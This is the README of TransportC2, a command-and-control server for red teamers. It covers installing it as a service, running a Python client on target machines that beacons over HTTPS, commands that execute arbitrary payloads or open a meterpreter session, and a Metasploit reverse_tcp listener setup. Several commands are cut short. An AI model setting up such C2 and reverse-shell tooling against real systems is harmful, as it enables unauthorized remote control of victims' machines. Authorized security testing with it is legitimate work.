TransportC2: Command and Control server that runs in the background as a service


TransportC2 is a command and control server that is able to run in the background as a service. This allows penetration testers and red teamers the ability to spend time gathering target machines, without being tied to an active session. Interact with clients through a private web interface that requires authentication, and allows administrators to add multiple users. All logins, commands, and responses are logged to provide a traceable point of reference.

Why “Transport”? TransportC2 is meant to be a long-term command and control server that allows users to direct payloads to other, shorter-term channels. This is exemplified by the built-in Metasploit payload, simply execute “msfpayload 4444” to open a meterpreter session on an infected client.



The TransportC2 server has two components:

  1. An HTTPS server that runs over port 443 and accepts incoming client connections.
  2. An HTTPS admin interface that runs over port 8443 and allows users to interact with clients via a web browser. This portal requires a username and password with a default login of admin:admin. Once logged in user’s can change their password and add other users to allow team sharing.

Modify server configurations prior to running the install script @ server/


The script will install all necessary requirements, create cert & key files, and move the working directory to /opt/transportc2:

git clone
cd transportc2/install
sudo chmod +x

Interact C2 Service

sudo systemctl start transportc2.service
sudo systemctl stop transportc2.service
sudo systemctl status transportc2.service


As of now, TransportC2 has a PoC client written in Python 2/3. Clients will make HTTPS requests to the C2 server and mimic a web connection. Variables at the top of the client file can be modified to change client check-in intervals, requesting page, etc.

Client Usage

Run the client on a target machine:

python3 443

Client Commands

Once a client is connected, login to the Admin Interface to execute one of the following commands:

stealth [int1] [int2]                   - Change client check-in intervals
msfpayload [ip] [port]                  - Launch Built in meterpreter payload
change_date [4-digit yr],[month],[day]  - Change max kill date on client
close                                   - Close / kill client
[command]                               - Execute payload on client

MSF Listener

Setup Metasploit to use built-in client payload:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set Lhost
set Lport 4444

Copyright (C) 2019 m8r0wn